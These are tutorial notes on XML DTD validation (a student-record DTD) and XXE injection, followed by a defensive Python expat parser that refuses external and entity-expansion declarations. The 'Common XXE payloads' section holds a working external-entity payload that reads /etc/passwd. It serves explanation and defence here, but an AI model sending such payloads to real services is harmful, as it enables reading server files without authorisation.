To validate the structure of an XML document we have the DTD, which stands for Document Type Definition. A DTD for a student (siswa) record:
<!DOCTYPE siswa [
  <!ELEMENT siswa (nama,nik,alamat,nohp)>
  <!ELEMENT nama (#PCDATA)>
  <!ELEMENT nik (#PCDATA)>
  <!ELEMENT alamat (#PCDATA)>
  <!ELEMENT nohp (#PCDATA)>
]>
#PCDATA means parsed character data: text that the parser scans for markup and entity references, which is why an entity reference placed inside such an element gets expanded.
Common XXE payloads:
<!-- Example of XXE: an internal entity declared in the DTD and expanded in the body -->
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
  <firstName>falcon</firstName>
  <lastName>&name;</lastName>
</userInfo>

<!-- Read system file: an external (SYSTEM) entity pointing at a local path -->
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
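The defensive side of both passages above, as an added example that is not part of the original notes: a small expat-based parser in Python's standard library that accepts a DTD with only ELEMENT declarations (like the siswa DTD), refuses any SYSTEM/PUBLIC or parameter entity before it is ever resolved (so the file:///etc/passwd payload is rejected at the declaration), and refuses internal entities unless the caller opts in, because internal entities are what billion-laughs expansion abuses. The function name `extract_text`, the exception class and the sample student values are my own constructions.

```python
import xml.parsers.expat as expat


class UnsafeDtdError(ValueError):
    """Raised when a document declares something a parser of untrusted input must not honour."""


def extract_text(xml_text, allow_internal_entities=False):
    """Parse XML with expat and return {element name: stripped text content}.

    External entities (SYSTEM/PUBLIC) and parameter entities are always refused.
    Internal entities such as <!ENTITY name "feast"> are refused unless the caller
    opts in, since they are the building block of entity-expansion (billion laughs) attacks.
    """
    parser = expat.ParserCreate()
    # Never fetch the external DTD subset or expand parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    stack = []   # names of currently open elements, innermost last
    texts = {}   # element name -> accumulated character data

    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Called for every <!ENTITY ...> in the DTD, before any reference to it is expanded.
        if is_parameter or system_id is not None or public_id is not None:
            raise UnsafeDtdError(f"external entity {name!r} declared (system id {system_id!r})")
        if not allow_internal_entities:
            raise UnsafeDtdError(f"internal entity {name!r} declared but entities are disabled")

    def external_entity_ref(context, base, system_id, public_id):
        # Defence in depth: even if a declaration slipped past, never resolve it.
        raise UnsafeDtdError(f"refusing to load external entity {system_id!r}")

    def start_element(name, attrs):
        stack.append(name)
        texts.setdefault(name, "")

    def end_element(name):
        stack.pop()

    def char_data(data):
        # Expanded internal entities arrive here as ordinary character data.
        if stack:
            texts[stack[-1]] += data

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_text, True)
    return {name: text.strip() for name, text in texts.items()}


# Constructed sample documents for the three cases discussed in the notes.
SISWA_DOC = """<!DOCTYPE siswa [
<!ELEMENT siswa (nama,nik,alamat,nohp)>
<!ELEMENT nama (#PCDATA)>
<!ELEMENT nik (#PCDATA)>
<!ELEMENT alamat (#PCDATA)>
<!ELEMENT nohp (#PCDATA)>
]>
<siswa><nama>Budi</nama><nik>0000000000000001</nik><alamat>Jl. Contoh 1</alamat><nohp>08123456789</nohp></siswa>"""

INTERNAL_ENTITY_DOC = """<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo><firstName>falcon</firstName><lastName>&name;</lastName></userInfo>"""

EXTERNAL_ENTITY_DOC = """<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""


if __name__ == "__main__":
    print(extract_text(SISWA_DOC))
    print(extract_text(INTERNAL_ENTITY_DOC, allow_internal_entities=True))
    try:
        extract_text(EXTERNAL_ENTITY_DOC)
    except UnsafeDtdError as exc:
        print("rejected:", exc)
```

The check fires in `EntityDeclHandler`, i.e. while the DTD is still being read, so the parser never reaches the `&read;` reference. The same idea in other stacks: lxml's `XMLParser(resolve_entities=False)`, or the `defusedxml` package, which wraps the standard-library parsers with equivalent refusals.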